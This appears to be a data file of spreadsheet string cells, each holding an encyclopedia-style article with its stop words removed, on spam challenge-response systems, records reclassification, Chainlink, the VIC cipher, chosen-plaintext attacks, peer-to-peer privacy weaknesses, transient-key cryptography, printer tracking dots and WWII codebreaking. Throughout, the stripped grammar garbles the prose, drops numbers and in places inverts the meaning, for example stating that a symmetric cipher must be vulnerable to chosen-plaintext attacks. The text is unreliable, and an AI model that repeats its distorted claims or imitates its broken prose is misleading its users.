false positives advocates claim systems lower rate false positives systems automatically filtering unsolicited bulk email.critics argue typical users systems still need review challenged mail regularly, looking non-bulk mail solicited bulk email sender responded challenge. this issue particularly notable newsletters, transactional messages, solicited bulk email, senders usually check challenges mail. however, bulk email question solicited, user could expected added whitelist. bulk email solicited, definition spam, filtered system. implementations tagged message delivery agent channel email just wants reply, actually determine user human (thus getting spammers legitimate emails require costly processing). fairuce ("fair unsolicited commercial email"), developed ibm, tried find relationship connecting envelope sender's domain name address client delivering mail, using series cached look-ups. relationship could found, fairuce checked recipient's whitelist blacklist, well domain's reputation, determine whether accept, reject, challenge reputation, present user whitelist/blacklist options. 2010, project listed "retired" technology. notes references external links spamhelp challenge/response services listing challenge/response filtering service providers when spam filters aren't enough, walt mossberg wall street journal, march 2007 challenge-response idea july 2006 challenge-response systems make matters worse february 2006 challenge-response anti-spam systems considered harmful december 2003 john levine: challenge-response systems harmful spam 2003 challenging response challenge-response 2003 what need know about challenge response spam filters 2003</t>
  </si>
  <si>
    <t>Withdrawal of previously declassified U.S. federal records</t>
  </si>
  <si>
    <t>withdrawal previously declassified u.s. federal records process agencies remove records public access believe incorrectly declassified made available public national archives records administration. process often referred "reclassification," records never properly declassified remained classified even made publicly available, re-classified. history 1995, president clinton signed executive order 12958 directed agencies declassify records twenty-five years older 1999, certain exemptions information remained sensitive. security concerns restricted data heightened 1999 case, taiwanese american nuclear weapons engineer accused selling secrets people’s republic china. additionally, state department accused department energy improperly releasing information authorized declassify. 1999, declassification efforts slowed considerably passage kyl-lott amendment 1999 defense authorization requires declassified records reviewed restricted data (rd) formerly restricted data (frd). kyl-lott amendment removal previously declassified records public access re-review restricted data.during george bush administration, signing executive order 13292 2003 eased process withdrawals delayed automatic declassification review. process codified 2009 signing executive order 13526 c.f.r. part 2001.13.the process removing previously declassified records covert revealed national security archive february 2006. following outcry journalists, historians, public, internal audit national archive’s information security oversight office indicated third records withdrawn since 1999, contain sensitive information. response, national archives made annual reports records withdrawn public access. withdrawals previously declassified records since 2006 notes reference also executive order 13233 freedom information (united states) national declassification center external links declassification reverse secret agreement reveals covert program hide reclassification public great bush reclassification project many where were nukes? isoo audit report exposes abuse classification system</t>
  </si>
  <si>
    <t>Chainlink (blockchain)</t>
  </si>
  <si>
    <t>chainlink decentralized blockchain oracle network built ethereum. network intended used facilitate transfer tamper-proof data off-chain sources on-chain smart contracts. creators claim used verify whether parameters smart contract manner independent contract's stakeholders connecting contract directly real-world data, events, payments, inputs. history chainlink created 2017 sergey nazarov steve ellis, co-authored white paper introducing chainlink protocol network cornell university professor juels year. chainlink acts "bridge" blockchain off-chain environments. network, services smart contracts, formally launched 2019.in 2018, chainlink integrated town crier, trusted execution environment-based blockchain oracle juels also worked town crier connects ethereum blockchain sources https.chainlink's trademark registered cayman islands 2019-03-12, corporation created smartcontract chainlink sezc, ltd.in 2020, chainlink integrated deco, cornell project co-created juels. deco described authors protocol uses zero-knowledge proofs allow users prove information true blockchain oracle without revealing sensitive information, birth dates. chainlink published second white paper april 2021. that paper, chainlink 2.0: next steps evolution decentralized oracle networks, detailed vision expanding role capabilities decentralized oracle networks include hybrid smart contracts, utilize on-chain code off-chain services provided oracle networks.by february 2022, chainlink secured billion deposits smart contracts used 1,100 projects. technology chainlink's decentralized oracle network open-source technology infrastructure allows blockchain securely connect off-chain data computation resources. network nodes fetch, validate, deliver data multiple sources onto blockchains execute smart contracts.in addition transfer external information blockchain, chainlink also used several different off-chain computation functions, including verifiable random function (vrf) data feeds. data feeds used bring election data on-chain.chainlink's used random number generation used decentralized gaming. zdnet reported verifiability random number generation ensures in-game results tamper-proof. link token node operators compensated network's native cryptocurrency, link. chainlink's link token erc677 token, extension erc20. tokens data payloads, feeding required data off-chain sources smart contracts, accordingly response data provided token. according chainlink, trade value derived tokens used node operators retrieving data smart contracts, also deposits placed node operators required contract creators. tokens stored erc20 wallet, erc677 token retains functionality erc20 token. february 2022, link 22nd largest cryptocurrency market value according report bank america. references</t>
  </si>
  <si>
    <t>VIC cipher</t>
  </si>
  <si>
    <t>cipher pencil paper cipher used soviet reino häyhänen, codenamed "victor". cipher given modern technical name, would known "straddling bipartite monoalphabetic substitution superenciphered modified double transposition." however, general classification part nihilist family ciphers. arguably complex hand-operated cipher ever seen, first discovered. initial analysis done american national security agency (nsa) 1953 absolutely conclude hand cipher, placement hollowed coin implied could decoded using pencil paper. cipher remained unbroken information structure available. although certainly complex secure modern computer operated stream ciphers block ciphers, practice messages protected resisted attempts cryptanalysis least discovery 1953 häyhänen's defection 1957. revolutionary leap cipher regarded evolutionary pinnacle nihilist cipher family. cipher several important integrated components, including chain addition, lagged fibonacci generator recursive formula used generate sequence pseudorandom digits), straddling checkerboard, disrupted double transposition. until discovery vic, generally thought double transposition alone complex cipher agent, practical matter, could field cipher. history during world several soviet rings communicated moscow centre using ciphers essentially evolutionary improvements basic nihilist cipher. strong version used clausen richard sorge's network japan, alexander foote lucy ring switzerland. slightly weaker version used rote kapelle network.in versions, plaintext first converted digits straddling checkerboard rather polybius square. this advantage slightly compressing plaintext, thus raising unicity distance also allowing radio operators complete transmissions quicker shut sooner. shutting sooner reduces risk operator found enemy radio direction finders. increasing unicity distance increases strength statistical attacks. clausen foote wrote plaintext english, memorized frequent letters english fill checkerboard) mnemonic phrase err" (dropping second "r"). standard english straddling checkerboard character slots cipher extra became "full stop" "numbers shift". numbers sent numbers shift, followed actual plaintext digits repeated pairs, followed another shift. then, similarly basic nihilist, digital additive added called "closing". however different additive used time, finally concealed "indicator group" inserted indicate additive used. unlike basic nihilist, additive added non-carrying addition (digit-wise addition modulo 10), thus producing uniform output leak much information. more importantly, additive generated keyword, selecting lines random almanacs industrial statistics. such books deemed dull enough arouse suspicion agent searched (particularly agents' cover stories businessmen), high entropy density provide secure additive. course figures book actually uniformly distributed (there excess (see benford's law), sequential numbers likely somewhat similar), nevertheless much higher entropy density passphrases like; rate, practice seem never successfully cryptanalysed. weaker version generated additive text novel similar book least rote kapelle member actually used good soldier schweik), this text converted digital additive using technique similar straddling checkerboard. ultimate development along lines cipher, used 1950s reino häyhänen. time, soviet agents instead using one-time pads. however, despite theoretical perfection one-time pad, practice broken, not. one-time cipher could however broken cipher pages re-used, logistic problems, therefore longer truly one-time. mechanics overview secret encryption following: short phrase (e.g. first line song, least letters long) date (written numerically, leading zeroes) personal number (unique agent, digit number)the encryption also aided adversary knowing 5-digit keygroup unique message. keygroup strictly 'secret', embedded in-clear ciphertext), location ciphertext known adversary. cipher broadly worked follows: secrets (phrase, date, keygroup personal number) create digit block pseudo random-numbers block create message keys for: straddling checkerboard columnar transpositions encrypt plaintext message straddling checkerboard apply transpositions resultant (intermediary) ciphertext columnar 'standard' columnar transposition diagonal columnar transposition insertion keygroup ciphertext determined sixth digit date detailed mechanics note: section tracks calculations referring [line-x] similar. this align notation stated archive description. pseudorandom block derivation [line-a]: generate random 5-digit keygroup [line-b]: write first digits secret date [line-c]: subtract [line-b] [line-a] modular arithmetic (digit-by-digit, 'borrowing' tens neighboring column) [line-d]: write first letters secret phrase [line-e.1&amp;2]: sequence (see below) first second characters separately [line-e.1] [line-e.2] respectively) [line-f.1]: write 5-digits [line-c], apply chain addition (see below) applied create five digits [line-f.2]: digit sequence '1234567890' written (under [line-e.2]) aide encoding creating [line-h] [line-g]: addition [line-e.1] [line-f.1] digit-by-digit mod-10 arithmetic, i.e. 'carrying' tens next column [line-h]: encoding (see below) digits [line-g] [line-e.2] [line-i]: [line-i] used, presumably avoid confusion misread 'j') [line-j]: sequencing [line-h] [lines-k,l,m,n,p]: these five 10-digit lines created chain addition [line-h]. last non-equal digits added agent's personal number determine length transpositions. (lines k-to-p in-effect key-driven pseudo-random block used next stage encryption) [line-o]: [line-o] used, presumably avoid confusion misread zero 'q') message derivation [line-q]: first digits extracted [lines-k,l,m,n,p] transposed [line-j]. (where first value resulting addition last non-equal digits [line-p] personal number). these used columnar transposition. [line-r]: next digits extracted (after digits extracted) [lines-k,l,m,n,p] transposed [line-j]. (where second value resulting addition last non-equal digits [line-p] personal number). these used diagonal transposition. [line-s]: sequencing [line-p], used straddling checkerboard example generation personal number: date: sept 1959 moon landing sept 1959 ('139195' truncated digits) phrase: 'twas night christmas' visit nicholas' poem keygroup: 72401 randomly generated [line-a]: 72401 keygroup [line-b]: 13919 date truncated digits [line-c]: 69592 subtract [line-b] [line-a] [line-d]: twasthenig htbeforech phrase truncated characters [line-e]: 8017942653 6013589427 sequencing [line-f]: 6959254417 1234567890 [line-c] chain addition, '1234567890' [line-g]: 4966196060 [line-e.1] [line-f.1] [line-h]: 3288628787 encode [line-g] [line-e.2], [line-f.2] helps [line-j]: 3178429506 sequencing [line-h] [line-k]: 5064805552 block: chain addition [line-h] digits [line-l]: 5602850077 [line-m]: 1620350748 [line-n]: 7823857125 [line-p]: 5051328370 last non-equal digits '0', added personal number means permutation keys digits long. [line-q]: 0668005552551 first digits block [line-r]: 758838 next digits block [line-s]: 5961328470 sequencing [line-p] message encryption straddling checkerboard once generated, first stage actually encrypting message convert series digits, done straddling checkerboard. (header row) checkerboard based [line-s]. then pre-agreed series common letters used second row. example uses english mnemonic sir', however cyrillic mnemonic used hayhanen 'snegopad', russian word snowfall. remaining cells filled rest alphabet/symbols filled order. example encoding below: message: 'attack dawn. dawn mean 0500. 0915 like last time.' 59956 96459 66583 38765 88665 83376 02538 00005 55000 00080 87319 80000 99911 15558 06776 42881 86667 66675 49976 0287- transpositions: columnar transposition message transposed standard columnar transposition keyed [line-q] above. (note: message encoded length multiple stage, additional digit added) message transposed diagonal transposition keyed [line-r] above. keygroup insertion (unencrypted) keygroup inserted ciphertext groups end; unused sixth digit date. modular addition/subtraction modular addition subtraction, also known 'false adding/subtraction', context (and many paper ciphers) digit-by-digit addition subtraction without 'carrying' 'borrowing'. example: 1234 6789 7913 1234 6789 5555 sequencing sequencing context ordering elements input 1-10 (where represents 10). this occurs either letters (whereby alphabetical order used), numbers (where numerical value used). event equal values, leftmost value sequenced first. example: letters: word 'octopus' sequenced '2163475' (i.e. c=1, first 'o'=2, second 'o'=3, ...) numbers: number '90210' sequenced '34215' numerical order. zero valued '10' terms ordering) chain addition chain addition akin linear-feedback shift register, whereby stream number generated output (and back input) seed number. within cipher chain addition works taking original (seed) number, false-adding first digits, putting number chain. this continues, however digits added incremented one. example, seed '90210', first iterations shown below: 90210 initial seed value 90210 (first digits) 90210 (next two...) 90210 90210 9231 90210 92319 0+9; note first generated back digit encoding encoding step replaces digit number (i.e. [line-g] cipher) sequence (i.e. [line-e.2]) represents position 1-10 ordering. seen writing series '1234567890' (shown [line-f.2]) underneath [line.e.2] value another simply replace every digit number encoded sequence. example number '90210' would encodings follows; {\displaystyle ({\ce {9-&gt;2}}),\,({\ce {0-&gt;7}}),\,({\ce {2-&gt;0}}),\,({\ce {1-&gt;6}}),\,({\ce {0-&gt;7}})} output would '27067'. decryption decrypt cipher follows: extract keygroup knowledge sixth digit secret date, remove digits keygroup ciphertext generate message keys using knowledge various secrets (phrase, date, personal number, keygroup) generate keys manner encryption process decrypt ciphertext using knowledge message keys transpositions straddling checkerboard decrypt cryptanalysis cipher strongest paper ciphers actually used real world, broken terms determining underlying algorithm) time. however, advent modern computing, public disclosure algorithm would considered strong cipher. observed majority entropy secret converges 10-digit number [line-h]. this 10-digit number approximately bits entropy, combined last digit date (needed identify keygroup would make bits entropy terms message strength. bits subject brute-force attack within less modern computers. also topics cryptography references external links page hollow nickel case images hollow nickel contained encrypted message "the cipher hollow nickel" cipher straddling checkerboards various different versions checkerboards cipher machines cryptology secom, variant extended checkerboard "the rise field ciphers: straddling checkerboard ciphers" greg goebel 2009</t>
  </si>
  <si>
    <t>Anti-Spam Research Group</t>
  </si>
  <si>
    <t>anti-spam research group (asrg) research group started within internet research task force (irtf), charter concluded march 2013. still reference melting anti-spam research theorization. particular, wiki lives dedicated research curbing spam internet-wide level, consists mailing list coordinate work small site wiki. irtf groups, asrg contributed internet engineering task force (ietf) process drafts, documents, assistance creation working groups. ietf group spun asrg marid. asrg sporadically active, little evolves anti-spam landscape, activity happening mailing list. 2008 asrg worked internet drafts dnsbls, 2010 standardization feedback loop (email). chairs asrg john levine taughannock networks (2003–2013) yakov shafranovich solidmatrix technologies (2003 2004) paul judge ciphertrust, inc. (2003) references external links wiki main page</t>
  </si>
  <si>
    <t>Chosen-plaintext attack</t>
  </si>
  <si>
    <t>chosen-plaintext attack (cpa) attack model cryptanalysis presumes attacker obtain ciphertexts arbitrary plaintexts. goal attack gain information reduces security encryption scheme.modern ciphers provide semantic security, also known ciphertext indistinguishability chosen-plaintext attack, therefore, design, generally immune chosen-plaintext attacks correctly implemented. introduction chosen-plaintext attack adversary (possibly adaptively) ciphertexts arbitrary plaintext messages. this formalized allowing adversary interact encryption oracle, viewed black box. attacker’s goal reveal part secret encryption key. seem infeasible practice attacker could obtain ciphertexts given plaintexts. however, modern cryptography implemented software hardware used diverse range applications; many cases, chosen-plaintext attack often feasible (see also practice). chosen-plaintext attacks become extremely important context public cryptography encryption public attackers encrypt plaintext choose. different forms there forms chosen-plaintext attacks: batch chosen-plaintext attack, adversary chooses plaintexts seeing corresponding ciphertexts. this often meaning intended "chosen-plaintext attack" qualified. adaptive chosen-plaintext attack (cpa2), adversary request ciphertexts additional plaintexts seeing ciphertexts plaintexts. general method attack general batch chosen-plaintext attack carried follows: attacker choose plaintexts. (this parameter specified part attack model, bounded.) attacker sends plaintexts encryption oracle. encryption oracle encrypt attacker's plaintexts send back attacker. attacker receives ciphertexts back oracle, attacker knows ciphertext corresponds plaintext. based plaintext–ciphertext pairs, attacker attempt extract used oracle encode plaintexts. since attacker type attack free craft plaintext match needs, attack complexity reduced.consider following extension situation. after last step, adversary outputs plaintexts chosen uniformly random {\displaystyle b\leftarrow \{0,1\}} adversary receives encryption attempts "guess" plaintext received, outputs b'.a cipher indistinguishable encryptions chosen-plaintext attack running experiment adversary can't guess correctly (b=b') probability non-negligibly better 1/2. examples following examples demonstrate ciphers meet security definitions broken chosen-plaintext attack. caesar cipher following attack caesar cipher allows full recovery secret key: suppose adversary sends message: attack dawn, oracle returns nggnpx qnja. adversary work recover would decrypt caesar cipher. adversary could deduce substitutions this would lead adversary determine used caesar cipher.with intricate complex encryption methodologies decryption method becomes resource-intensive, however, core concept still relatively same. one-time pads following attack one-time allows full recovery secret key. suppose message length length equal adversary sends string consisting zeroes oracle. oracle returns bitwise exclusive-or string zeroes. string returned oracle secret key.while one-time used example information-theoretically secure cryptosystem, security holds security definitions weaker security. this formal definition security encryption oracle state. this vulnerability applicable practical implementations one-time still made secure reuse avoided (hence name "one-time" pad). practice world navy cryptanalysts discovered japan planning attack location referred "af". they believed "af" might midway island, locations hawaiian islands codewords began "a". prove hypothesis "af" corresponded "midway island" asked forces midway send plaintext message supplies. japanese intercepted message immediately reported superiors "af" water, confirming navy's hypothesis allowing position force battle.also world allied codebreakers bletchley park would sometimes royal force mines position abbreviations alternatives german naval system's grid reference. hope germans, seeing mines, would enigma machine encrypt warning message mines "all clear" message removed, giving allies enough information message break german naval enigma. this process planting known-plaintext called gardening. allied codebreakers also helped craft messages sent double agent juan pujol garcía, whose encrypted radio reports received madrid, manually decrypted, re-encrypted enigma machine transmission berlin. this helped codebreakers decrypt code used second leg, supplied original text.in modern day, chosen-plaintext attacks (cpas) often used break symmetric ciphers. considered cpa-secure, symmetric cipher must vulnerable chosen-plaintext attacks. thus, important symmetric cipher implementors understand attacker would attempt break cipher make relevant improvements. chosen-plaintext attacks, small part plaintext need chosen attacker; attacks known plaintext injection attacks. relation attacks chosen-plaintext attack powerful known-plaintext attack, attacker directly target specific terms patterns without wait appear naturally, allowing faster gathering data relevant cryptanalysis. therefore, cipher prevents chosen-plaintext attacks also secure known-plaintext ciphertext-only attacks. however, chosen-plaintext attack less powerful chosen-ciphertext attack, attacker obtain plaintexts arbitrary ciphertexts. cca-attacker sometimes break cpa-secure system. example, gamal cipher secure chosen plaintext attacks, vulnerable chosen ciphertext attacks unconditionally malleable. references</t>
  </si>
  <si>
    <t>Privacy in file sharing networks</t>
  </si>
  <si>
    <t>peer-to-peer file sharing (p2p) systems like gnutella, kazaa, edonkey/emule, become extremely popular recent years, estimated user population millions. academic research paper analyzed gnutella emule protocols found weaknesses protocol; many issues found networks fundamental probably common networks. users file sharing networks, emule gnutella, subject monitoring activity. clients tracked address, name, software version use, files share, queries initiate, queries answer clients also share private files network without notice inappropriate settings.much known network structure, routing schemes, performance load fault tolerance systems general. might surprising, emule protocol provide much privacy users, although protocol supposed decentralized. gnutella emule protocols emule protocol emule clients implements edonkey network. emule protocol consists types messages. when emule client connects network, first gets list known emule servers obtained internet. despite fact millions emule clients, small amount servers. client connects server connection. that stays open long client connected network. upon connecting, client sends list shared files server. server builds database files reside client. server also returns list known servers. server returns client, unique client identifier within system. server generate query replies clients directly connected download done dividing file parts asking client part. gnutella protocol gnutella protocol v0.4 gnutella protocol v0.4 nodes identical, every node choose connect every other. gnutella protocol consist message types: query tile search. query messages flooding mechanism, i.e. node receives query forwards adjacent graph node links. node receives query appropriate file replies query message. count field header limits message lifetime. ping pong messages used detecting nodes linked actual file download performed opening connection using http mechanism. gnutella protocol v0.6 gnutella protocol v0.6 includes several modifications: node operational modes: "leaf node" "ultrapeer". initially node starts leaf node mode connect ultrapeers. leaf nodes send query ultrapeer, ultrapeer forwards query waits replies. when node enough bandwidth uptime, node become ultrapeer. ultrapeers send periodically request clients send list shared files have. query arrives search string matches files leaves, ultrapeer replies pointing specific leaf. tracking initiators responders version gnutella protocol, ultrapeer receives message leaf node (message count zero) knows sure message originated leaf node.in version protocol, ultrapeer receives message ultrapeer count zero knows message originated ultrapeer leaves (the average number leaves nodes connected ultrapeer 200). tracking single node many clients gnutella http monitor feature. this feature allows sending information node node supports empty http request, receiving response. research shows simple crawler connected gnutella network initial entry point list addresses connected entry point. then crawler continue inquire addresses. academic research performed following experiment: nyu, regular gnucleus software client connected gnutella network leaf node, distinctive listening port 44121. hebrew university, jerusalem, israel, crawler looking client listening port 44121. less minutes crawler found address gnucleus client unique port. address harvesting user connected gnutella network within, say, last hours, user's address easily harvested hackers, since http monitoring feature collect 300,000 unique addresses within hours. tracking nodes guid creation globally unique identifier (guid) bytes field gnutella message header, uniquely identifies every gnutella message. protocol specify generate guid.gnucleus windows uses ethernet address used guid lower bytes. therefore, windows clients reveal address sending queries.in jtella client software guid created using java random number without initialization. therefore, session, client creates sequence queries repeating ids. over time, correlation user queries found. collecting miscellaneous information users monitoring facility gnutella reveals abundance precious information users. possible collect information software vendor version clients use. other statistical information client available well: capacity, uptime, local files etc.in gnutella v0.6, information client software collected (even client support http monitoring). information found first messages connection handshake. tracking users partial information some gnutella users small look-alike set, makes easier track knowing partial information. tracking users queries academic research team performed following experiment: team five gnutella ultrapeer order listen nodes’ queries). team revealed queries. usage hash functions sha-1 hashes refer sha-1 files search strings. half search queries strings half output hash function (sha-1) applied string. although usage hash function intended improve privacy, academic research showed query content exposed easily dictionary attack: collaborators ultrapeers gradually collect common search strings, calculate hash value store dictionary. when hashed query arrives, collaborated ultrapeer check matches dictionary expose original string accordingly. measures common countermeasure used concealing user's address downloading uploading content using anonymous networks, anonymous network. there also data encryption indirect connections (mix networks) exchange data peers. thus traffic anonymized encrypted. unfortunately, anonymity safety come price much lower speeds, nature networks internal networks currently still less content. however, change, users. also gnutella2, reworked network based gnutella bitzi, open content file catalog integrated gnutella clients torrent poisoning references further reading quantitative analysis gnutella network traffic zeinalipour-yazti, folias 2002 crawling gnutella: lessons learned deschenes, weber, davison 2004 security aspects napster gnutella steven bellovin 2001 firewalls internet security: repelling wily hacker, second edition daswani, neil; garcia-molina, hector. query-flood attacks gnutella emule protocol specification danny bickson yoram kulbak huji. external links emule project official website emule sourceforge (sourceforge) contains archives past versions emule list allowed emule-mods</t>
  </si>
  <si>
    <t>Transient-key cryptography</t>
  </si>
  <si>
    <t>transient-key cryptography form public-key cryptography wherein keypairs generated assigned brief intervals time instead individuals organizations, blocks cryptographic data chained time. transient-key system, private keys used briefly destroyed, sometimes nicknamed “disposable crypto.” data encrypted private associated specific time interval irrefutably linked interval, making transient-key cryptography particularly useful digital trusted timestamping. transient-key cryptography invented 1997 michael doyle eolas, adopted ansi x9.95 standard trusted timestamps. public-key transient-key cryptography both public-key transient-key systems used generate digital signatures assert given piece data changed since signed. similarities there. traditional public system, public/private keypair typically assigned individual, server, organization. data signed private asserts signature came indicated source. keypairs persist years time, private component must carefully guarded disclosure; public-key system, anyone access private counterfeit person's digital signature. transient-key systems, however, keypair assigned brief interval time, particular person entity. data signed specific private becomes associated specific time date. keypair active minutes, private permanently destroyed. therefore, unlike public-key systems, transient-key systems depend upon long-term security private keys. establishing data integrity transient-key timestamps transient-key system, source time must consistent standard understood senders receivers. since local system clock changed user, never used source time. instead, data digitally signed time value derived universal coordinated time (utc) accurate within millisecond, accordance ansi x9.95 standard trusted timestamping. whenever time interval transient-key system expires, public/private keypair generated, private previous interval used digitally certify public key. private destroyed. this "key-chaining" system immediate ancestor blockchain technology vogue today. interval, time values obtained trusted third-party source, specific moments time interpolated received times using time-biasing method based internal system timer. trusted time source cannot obtained running within specified tolerances, transient private keys issued. case, time interval chain terminated, fresh begun. chains connected network archives, enable servers continue verify data integrity time protected data, regardless often chain must restarted. start times chain interval coupled together form unbroken sequence public keys, used following: irrefutably identify time data signed. identify exact state data time signed.as extra security measure, requests signatures made interval stored concatenated appended public start next interval. this mechanism makes impossible insert “signed events” interval chain fact. cross-verification through independently operating servers, cross-certification provide third-party proof validity time interval chain irrefutable evidence consensus current time. transient-key cryptographic systems display high byzantine fault tolerance. interconnected cross-certifying servers distributed environment creates widely witnessed chain trust strong strongest link. contrast, entire hierarchies traditional public systems compromised single private exposed. individual transient interval chain cross-certified transient chains server instances. through cross-certification, server signs server interval chain, signed data interval definition. effect, private keys server used sign public keys server diagram, server instance cross-certified server instances (blue orange). cross-certification requires timestamp interval agree timestamp cross-certifying server within acceptable tolerances, user-defined typically hundred milliseconds duration. network archives along intervals, cross-certifications stored network archive. within transient-key network, archive logical database stored replicated system enable verification data timestamped signed transient keys. accessible archives stored within every digital signature created system. whenever cross-certifications completed beginning interval, archive updated published servers network. verification during interval, transient private used sign data concatenated trusted timestamps authenticity certificates. verify data later time, receiver accesses persistent public appropriate time interval. public applied digital signature passed published cryptographic routines unpack hash original data, compared fresh hash stored data verify data integrity. signature successfully decrypts using particular interval's published public key, receiver assured signature originated time period. decrypted fresh hashes match, receiver assured data tampered since transient private created timestamp signed data. transient-key cryptography invented 1997 michael doyle eolas technologies inc., working visible embryo project later acquired productized proofspace, inc. adopted national standard ansi x9.95 standard trusted timestamping. transient-key cryptography predecessor forward secrecy formed foundation forward-signature-chaining technology bitcoin blockchain system. proofspace, published detailed technical overview document transient cryptography. references external links</t>
  </si>
  <si>
    <t>Machine Identification Code</t>
  </si>
  <si>
    <t>machine identification code (mic), also known printer steganography, yellow dots, tracking dots secret dots, digital watermark certain color laser printers copiers leave every printed page, allowing identification device used print document giving clues originator. developed xerox canon mid-1980s, existence became public 2004. 2018, scientists developed privacy software anonymize prints order support whistleblowers publishing work. history mid-1980s xerox pioneered encoding mechanism unique number represented tiny dots spread entire print area. xerox developed machine identification code assuage fears color copiers could used counterfeit bills" received u.s. patent 5515451 describing yellow dots identify source copied printed document.the public first became aware october 2004, used dutch authorities track counterfeiters used canon color laser printer. november 2004, world reported machine identification code used decades printers, allowing enforcement identify track counterfeiters. central bank counterfeit deterrence group (cbcdg) denied developed feature. 2005, civil rights group electronic frontier foundation (eff) encouraged public send sample printouts subsequently decoded pattern. pattern demonstrated wide range printers different manufacturers models. stated 2015 documents previously received foia suggested major manufacturers color laser printers entered secret agreement governments ensure output printers forensically traceable.in 2007, european parliament asked question invasion privacy. technical aspects pattern consists dot-matrix spread yellow dots, barely seen naked eye. dots diameter tenth millimeter (0.004") spacing millimeter (0.039"). their arrangement encodes serial number device, date time printing, repeated several times across printing area case errors. example, code consists dots square hexagonal pattern, spreads surface square centimetres (0.62 appears sheet size paper times. thus, analyzed even fragments excerpts available. some printers arrange yellow dots seemingly random point clouds. according chaos computer club 2005, color printers leave code matrix dots thus store bytes data (64×8).as 2011, xerox manufacturers draw attention marked pages, stating product description, "the digital color printing system equipped anti-counterfeit identification banknote recognition system according requirements numerous governments. each copy shall marked label which, necessary, allows identification printing system created. this code visible normal conditions."in 2018, scientists dresden analyzed patterns printer models manufacturers found four different encoding schemes. visibility machine identification code made visible printing copying page subsequently scanning small section high-resolution scanner. yellow color channel enhanced image processing program, make dots clearly visible. under good lighting conditions, magnifying glass enough pattern. under uv-light yellow dots clearly recognizable. using steganographic process, high-quality copies original (e.g. bank note) blue light made identifiable. using process, even shredded prints identified: 2011 "shredder challenge" initiated darpa solved team called "all your shreds belong u.s." consisting otavio good colleagues. practical application both journalists security experts suggested intercept's handling leaks whistleblower reality winner, included publishing secret documents unredacted including printer tracking dots, used identify winner leaker, leading arrest conviction. protection privacy circumvention copies printouts documents confidential personal information, example health care information, account statements, declaration balance sheets, traced owner printer inception date documents revealed. this traceability unknown many users inaccessible, manufacturers publicize code produces patterns. unclear data unintentionally passed copy printout. particular, mentions technique support materials affected printers. 2005 electronic frontier foundation (eff) sought decoding method made available python script analysis.in 2018, scientists dresden developed published tool extract analyze steganographic codes given color printer subsequently anonymize prints printer. anonymization works printing additional yellow dots machine identification code. scientists made software available support whistleblowers efforts publicize grievances. comparable processes other methods identification easily recognizable yellow dots. example, modulation laser intensity variation shades grey texts already feasible. 2006, unknown whether manufacturers also using techniques. also eurion constellation, matrix spread bank note, stops printers color copiers processing taggant explosive taggants typewriter forensic examination references external links laudatio deutschen bigbrotherawards 2004 german) information chaos computer club information electronic frontier foundation list printers, print dots (last updated 2017)</t>
  </si>
  <si>
    <t>Magic (cryptography)</t>
  </si>
  <si>
    <t>magic allied cryptanalysis project world involved united states army's signals intelligence service (sis) united states navy's communication special unit. codebreaking magic combine government's cryptologic capabilities organization dubbed research bureau. intelligence officers army navy (and later civilian experts technicians) roof. although worked series codes cyphers, important successes involved red, blue, purple. 1923, navy officer acquired stolen copy secret operating code codebook used japanese navy world photographs codebook given cryptanalysts research desk processed code kept red-colored folders indicate secret classification). this code called "red". blue 1930, japanese government created complex code codenamed blue, although still used low-level communications. quickly broken research desk later 1932. military intelligence comint listening stations began monitoring command-to-fleet, ship-to-ship, land-based communications. purple after japan's ally germany declared fall 1939, german government began sending technical assistance upgrade communications cryptography capabilities. part send modified enigma machines secure japan's high-level communications germany. code, codenamed purple (from color obtained mixing blue), baffling. purple, like enigma, began communications line code became unfathomable jumble. codebreakers tried break purple communiques hand found could not. then codebreakers realized manual additive substitution code like blue, machine-generated code similar germany's enigma cipher. decoding slow much traffic still hard break. time traffic decoded translated, contents often date. reverse-engineered machine created 1939 team technicians william friedman frank rowlett could decrypt purple code replicating settings japanese enigma machines. this sped decoding addition translators staff 1942 made easier quicker decipher traffic intercepted. purple traffic japanese foreign office used cipher machine encrypt diplomatic messages. machine called "purple" u.s. cryptographers. message typed machine, enciphered sent identical machine. receiving machine could decipher message correct settings, keys. american cryptographers built machine could decrypt messages. purple machine first used japan 1940. u.s. british cryptographers broken purple traffic well attack pearl harbor. however, purple machines used foreign office carry diplomatic traffic embassies. japanese navy used completely different crypto-system, known jn-25. u.s. analysts discovered hint purple impending japanese attack pearl harbor. could they, japanese careful discuss plan foreign office communications. detailed information planned attack even available japanese foreign office, agency regarded military, particularly nationalist members, insufficiently "reliable". u.s. access private japanese diplomatic communications (even secret ones) less useful might otherwise policy prewar japan controlled largely military groups like imperial faction, foreign office. foreign office deliberately withheld embassies consulates much information have, ability read purple messages less definitive regarding japanese tactical strategic military intentions. u.s. cryptographers (see station hypo) decrypted translated 14-part japanese diplomatic message breaking ongoing negotiations u.s. p.m. washington time december 1941, even japanese embassy washington could result deciphering typing difficulties embassy, note delivered late american secretary state cordell hull. when japanese diplomats finally delivered note, hull pretend reading first time, even though already knew attack pearl harbor.throughout war, allies routinely read german japanese cryptography. japanese ambassador germany, general hiroshi ōshima, often sent priceless german military information tokyo. this information routinely intercepted read roosevelt, churchill eisenhower. according lowman, "the japanese considered purple system absolutely unbreakable… most went graves refusing believe [cipher] broken analytic means… they believed someone betrayed system." distribution prior pearl harbor even diplomatic information limited value u.s. manner description. "magic" distributed many policy-makers need information knew nothing actually distributed least pearl harbor) message briefly, courier stood take back, isolation messages copies notes permitted). before pearl harbor, decrypts thought "important enough" distributing army navy officers. nonetheless, able read purple messages gave allies great advantage war. instance, japanese ambassador germany, baron hiroshi ōshima, produced long reports tokyo enciphered purple machine. they included reports personal discussions adolf hitler report tour invasion defenses northern france (including d-day invasion beaches). general marshall said ōshima "our main basis of... information regarding hitler's intentions europe". dewey marshall during 1944 election, thomas dewey threatened make pearl harbor campaign issue, general marshall sent personal letter said, part: explain critical nature set-up, would wiped instant least suspicion aroused regarding battle coral based deciphered messages therefore ships right place right time. further, able concentrate limited forces meet naval advance midway otherwise almost certainly would 3,000 miles [4,800 place. full information strength forces.dewey promised raise issue, kept word. post-war debates break purple system, japanese messages generally, subject acrimonious hearings congress post-world connection attempt decide who, anyone, allowed disaster pearl harbor happen therefore blamed. during hearings japanese learned, first time, purple cypher system broken. they continuing even war, encouragement american occupation government. much confusion washington hawaii knew when, especially decrypting messages," conclude "someone washington" knew pearl harbor attack happened, and, since pearl harbor expecting attacked, "failure warn hawaii coming must deliberate, since could hardly mere oversight". however, purple diplomatic, military code. thus, inferences could drawn purple specific japanese military actions. history when purple broken u.s. army's signals intelligence service (sis), several problems arose americans: would decrypts, decrypts, often, circumstances, crucially (given interservice rivalries) would delivering. both 